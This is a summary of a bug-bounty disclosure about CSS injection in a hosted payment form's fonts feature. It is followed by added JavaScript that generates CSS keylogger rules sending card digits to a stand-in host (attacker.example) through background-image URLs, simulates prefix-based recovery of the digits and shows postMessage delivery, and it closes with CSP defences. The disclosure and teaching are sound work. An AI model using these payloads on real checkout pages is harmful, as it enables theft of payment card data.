The article discloses a CSS injection vulnerability in a hosted fonts mechanism, found through a private bug bounty program. It explains how attacker-controlled CSS can leak credit card data by matching input values with attribute selectors and exfiltrating them through background-image URLs, outlines the three-step attack flow, and walks through a PoC delivered via postMessage, closing with specific indicators such as the hosted payment form and the redacted domains. #CSSKeylogger #CSSInjection #checkout.redacted.com #redacted.com #HostedParams
Keypoints
- Discloses a CSS injection vulnerability in a hosted fonts mechanism, found through a private bug bounty program.
- Explains how CSS can be used to leak credit card data by matching input values with attribute selectors and exfiltrating them through background-image URLs.
- Describes the CSS keylogger concept and its limitations, including the handling of repeated characters and special keys.
- Outlines a multi-step attack flow: the victim clicks an attacker-controlled link, enters card details into the hosted payment form, and the data is exfiltrated to the attacker's server.
- Provides a PoC demonstrating how to craft CSS payloads and deliver them to the hosted payment form using postMessage.
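The points above (attribute-selector exfiltration, the keylogger's repeat limitation, and postMessage delivery) as one worked example. This is added illustration code, not the article's PoC: the field selector, the attacker exfil host, the digit charset and the `{type, css}` message shape are all assumptions, and the victim is simulated in-process so the block runs offline and shows why a suffix-based keylogger loses repeated digits while prefix probing recovers them.

```javascript
// Added example (not the article's code). Assumed names: EXFIL_BASE is a
// hypothetical attacker origin, TARGET_SELECTOR a hypothetical card field,
// and the postMessage payload shape is invented for illustration.
const EXFIL_BASE = "https://attacker.example/leak";
const TARGET_SELECTOR = 'input[name="cardnumber"]';
const CHARSET = "0123456789"; // card numbers are digits only

// Classic suffix keylogger: one rule per character, firing when the value
// ends with it. A browser requests each background-image URL once per
// document, so a repeated character never triggers a second request.
function buildSuffixKeylogger(charset = CHARSET, exfil = EXFIL_BASE, sel = TARGET_SELECTOR) {
  return [...charset].map(ch =>
    `${sel}[value$="${ch}"]{background-image:url("${exfil}?k=${encodeURIComponent(ch)}")}`);
}

// Prefix probe: one rule per candidate next character given what is already
// known. Every prefix is a distinct URL, so repeats are recovered; the cost is
// one fresh stylesheet per recovered character.
function buildPrefixProbe(known, charset = CHARSET, exfil = EXFIL_BASE, sel = TARGET_SELECTOR) {
  return [...charset].map(ch => {
    const prefix = known + ch;
    return `${sel}[value^="${prefix}"]{background-image:url("${exfil}?p=${encodeURIComponent(prefix)}")}`;
  });
}

// Minimal emulation of how a browser evaluates [value^=..] / [value$=..]
// rules against the field's current value attribute, returning the URLs it
// would request. `seen` models the per-document image cache.
const RULE_RE = /\[value(\^|\$)="([^"]*)"\]\{background-image:url\("([^"]+)"\)\}/;
function simulateFetches(value, rules, seen = new Set()) {
  const fetched = [];
  for (const rule of rules) {
    const m = RULE_RE.exec(rule);
    if (!m) continue;
    const [, op, needle, url] = m;
    const hit = op === "^" ? value.startsWith(needle) : value.endsWith(needle);
    if (hit && !seen.has(url)) { seen.add(url); fetched.push(url); }
  }
  return fetched;
}

// Attacker side: victim types `secret` one character at a time; the value
// attribute is assumed to mirror the typed value (as it does when a framework
// re-renders value={...}) and the attacker re-issues the probe after each hit.
function recoverByPrefix(secret, charset = CHARSET) {
  const seen = new Set();
  let known = "";
  for (let typed = 1; typed <= secret.length; typed++) {
    const hits = simulateFetches(secret.slice(0, typed), buildPrefixProbe(known, charset), seen);
    if (hits.length !== 1) break; // no hit: character outside the charset
    known = new URL(hits[0]).searchParams.get("p");
  }
  return known;
}

// Same victim against the suffix keylogger: returns the keys the attacker's
// server actually sees, in order. Repeats are silently dropped.
function recoverBySuffix(secret, charset = CHARSET) {
  const seen = new Set();
  const rules = buildSuffixKeylogger(charset);
  let log = "";
  for (let typed = 1; typed <= secret.length; typed++) {
    for (const url of simulateFetches(secret.slice(0, typed), rules, seen)) {
      log += new URL(url).searchParams.get("k");
    }
  }
  return log;
}

// Delivery step: hand the generated CSS to the hosted form's window. The
// message shape is a hypothetical stand-in for whatever the hosted-fonts
// feature actually accepts; always pin targetOrigin rather than using "*".
function deliverCss(targetWindow, css, targetOrigin) {
  targetWindow.postMessage({ type: "hostedFonts", css }, targetOrigin);
}
```

With a card number such as `4411...`, `recoverBySuffix` yields `41` while `recoverByPrefix` returns the full digits, which is the repeat limitation the article calls out. On the defensive side the same emulation is a useful check: any rule in page CSS whose `background-image` points off-origin and is guarded by an attribute selector on a sensitive input is a leak, and a `Content-Security-Policy` with a restrictive `img-src` and `style-src` stops both the beacon and the injected stylesheet.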